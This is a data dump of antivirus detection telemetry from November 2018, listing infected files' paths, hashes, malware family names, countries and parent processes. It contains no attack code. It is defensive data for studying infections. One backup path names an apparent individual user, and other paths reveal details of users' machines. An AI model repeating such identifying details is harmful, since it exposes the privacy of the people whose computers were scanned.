  Row(detection=Row(filename='tmp00019297', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00019297', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151749-906a8114', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-151714-8C8CE7AB\\AVSCAN-20181104-151749-906A8114', filesize=512000, name='Adware/SpeedBit.ngud.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T08:17:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vlc-2.1.6a-win32setup.exe', filepath='C:\\Users\\X\\Downloads\\Programs\\vlc-2.1.6a-win32setup.exe', filesize=596000, name='PUA/Outbrowse.Gen.#M300.#R5962'), hash='4dbf49f6a9354c4912929ac204821cda50ad285e242808ccf9ec4790b773ceda', metadata=Row(cmdline='run --updated 5.10.0.1789  -t 751924', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Line\\bin\\current\\LINE.exe', parentsize=12569184, timestamp='2018-11-04T05:18:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:06:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='166cc02d31acea15ad5a0af21e30e3363b43fb5f611b2ad2bf76d8f50a746b89', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T03:39:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152647-6a85dd03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-152647-6A85DD03', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:26:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe748_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe748 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T23:58:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:40:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:48:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1042589\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T00:18:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130820-0a16f386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130820-0A16F386', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-032508-a7f92327', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e5c5519\\AVSCAN-20181104-032442-A2A8F3F6\\AVSCAN-20181104-032508-A7F92327', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:25:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204624-998ef513', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e425a12\\AVSCAN-20181104-203459-4E013254\\AVSCAN-20181104-204624-998EF513', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='4f420384bbde9a381f43a6e1eab8132355104d6f380874d02d4dec58099a4fff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:46:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maxjongg.exe', filepath='D:\\العاب حديثة\\تشابه المكعبات\\maxjongg.exe', filesize=1024000, name='W32/Virut.Gen.#M1.#R1'), hash='7993f9e62f73ca0e53ba24d421d2b61856b030ec652e8e13c6e85563a3bf385d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085338-33cd7cce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1aa6796b\\AVSCAN-20181104-085325-31FC0522\\AVSCAN-20181104-085338-33CD7CCE', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:21:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7fab5d6462b6772b9d0189a304fe1dfeba2e0574925c1ab6a57bfd122fcbdfed', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T03:58:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0348809.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP439\\A0348809.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:45:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132117-1855315a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-132117-1855315A', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:21:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='simms.exe', filepath='C:\\Program Files (x86)\\Bolshevism\\simms.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='2308f6cbca6e4919b6b50d3e3952464aee5e99967a2e8e3f2d44ef88286b34ec', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Bolshevism\\simms.exe', parentsize=384000, timestamp='2018-11-04T03:09:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lliseconc1.exe', filepath='\\\\?\\C:\\RECYCLER\\S-1-5-21-0243556031-888888379-781862338-196852800\\lliseconc1.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='95c3b6554b515ddec9afdca23daf2213796fe0ceca89bfc9c7cb6c36cf82978d', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:06:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140224-ee028aa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140224-EE028AA3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='0d1593e54e93e09077e3ca8722f813d99da89241786fbc8a9bbce08446682b95', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T07:19:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dự trù.exe', filepath='C:\\Users\\X\\Desktop\\khảo sát mô hình tự phòng, tự quản về ANTT\\khảo sát mô hình tự phòng, tự quản về ANTT\\Dự trù.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='b323743ddb5a68de32eebdbac0e9d9b7692e0aeaf7efe2376db7e22d86511459', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:42:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='csproj.dll', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VC#\\VCSPackages\\csproj.dll', filesize=1984000, name='W32/Ramnit.CD.#M1.#R1'), hash='7f45aed6fe42f14a6176e557916685223708d5354edccc2caff8ad686b29cab2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T03:54:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180005-f65ce651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0bc51104\\AVSCAN-20181104-165011-9512470A\\AVSCAN-20181104-180005-F65CE651', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T12:00:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhx-xs.exe', filepath='E:\\العاب\\الفراخ الطائرة\\MHX-XS.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='899a25541436668a866ed88a2007ddf00100692d1f0f2bd99364d68a2c949729', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T14:18:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:05:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='convertavitomp4_setup-downloader.exe', filepath='\\\\s02\\install\\Software\\_Video\\convertavitomp4_setup-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='0c958b5f847c20f5dfe26f112d47e0f8f4e69558a64b2ebfd97e9da8e629756d', metadata=Row(cmdline='\\\\\\\\\\\\\\\\s02\\\\\\\\install\\\\\\\\ E:\\\\\\\\S02\\\\\\\\install\\\\\\\\ *.* \\\\\\/R:3 \\\\\\/W:1 \\\\\\/mir \\\\\\/log+:install.log', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\Robocopy.exe', parentsize=103936, timestamp='2018-11-04T10:41:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215721-348ded59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41ed2522\\AVSCAN-20181104-215535-21FF7B6F\\AVSCAN-20181104-215721-348DED59', filesize=64000, name='HEUR/AGEN.1015942.#M1.#R1'), hash='52a2024f3695ba688d2340ea07e55eb2a5dc274af41d4e4dcbfcc49bb53f8231', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:57:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='skincrafterdll.dll', filepath='\\\\?\\E:\\BaiduYunDownload\\联想E驱动\\Easy_DriverPacks\\Files\\SkinCrafterDll.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cfcf7fbdfe90830b18bd2ea439aaf404084b23813c76b14fa25ceaf600e8935', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:01:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151731-e2554f91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd10c7b\\AVSCAN-20181104-150719-909FFCA3\\AVSCAN-20181104-151731-E2554F91', filesize=512000, name='HEUR/AGEN.1019708.#M1.#R1'), hash='2b42bff479811938c6fe0c277d9bb34e3fd272ca38b4356253c340700d1d353e', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:17:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:01:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003391.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003391.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='2442b34d614f97411b56d9aa07c83b2a4c54ddc0edcf258bced6cbd0e295c268', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T14:17:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unins000.exe', filepath='C:\\Program Files\\Aurora3D\\Maker3D\\unins000.exe', filesize=22528000, name='W32/Sality.AT.#M1.#R1'), hash='2eb0e7c909557cd71d15f7f2bbc41058a26d7660b62fc318cbe36b84a761c11c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='-elevate4820', country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=2199256, timestamp='2018-11-04T09:36:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:15:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-080246-2023badd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bb1b655\\AVSCAN-20181104-075238-EEAFA995\\AVSCAN-20181104-080246-2023BADD', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='8d271e03cf169e0b53c74373d21ca68b16568297da1f1418647457e01696a336', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:02:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='trza781.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\trzA781.tmp', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='da9001338852aa8b26d9c06203e000fcf820196cb77f62c642f9f1e58737b50c', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090037-d62c1009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-090037-D62C1009', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='b0469e6812e239a47caef5a5e475244e2d101c572bedfdebad412bb855409143', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:02:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102048-a58f922a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102048-A58F922A', filesize=64000, name='TR/Agent.64000.119.#M1.#R1'), hash='892d3d7968ba29bd8e521710a5d9a62748c78fd4436a11cbc94c1ec4fb096f02', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221511-5c6bb08b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221511-5C6BB08B', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200051-bf114caa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_001e0289\\AVSCAN-20181102-194148-54DD84AC\\AVSCAN-20181102-200051-BF114CAA', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='n.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\SystemMonitor\\n.dll', filesize=9060000, name='PUA/PUA/CPUGuardian.#M1.#R1'), hash='ca7a812237ef6c287bb44e5729273694e0d9108a890fc1f1271589c3d3d335e2', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:24:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T22:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a8d58f2a6c822eadd2715f83e09e05d71089d5ead0db30dccf9937eed917c537', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:40:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\PROGRAM FILES\\ADOBE\\ACROBAT 9.0\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:35:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:27Z'), dt=datetime.date(2018, 11, 2)),
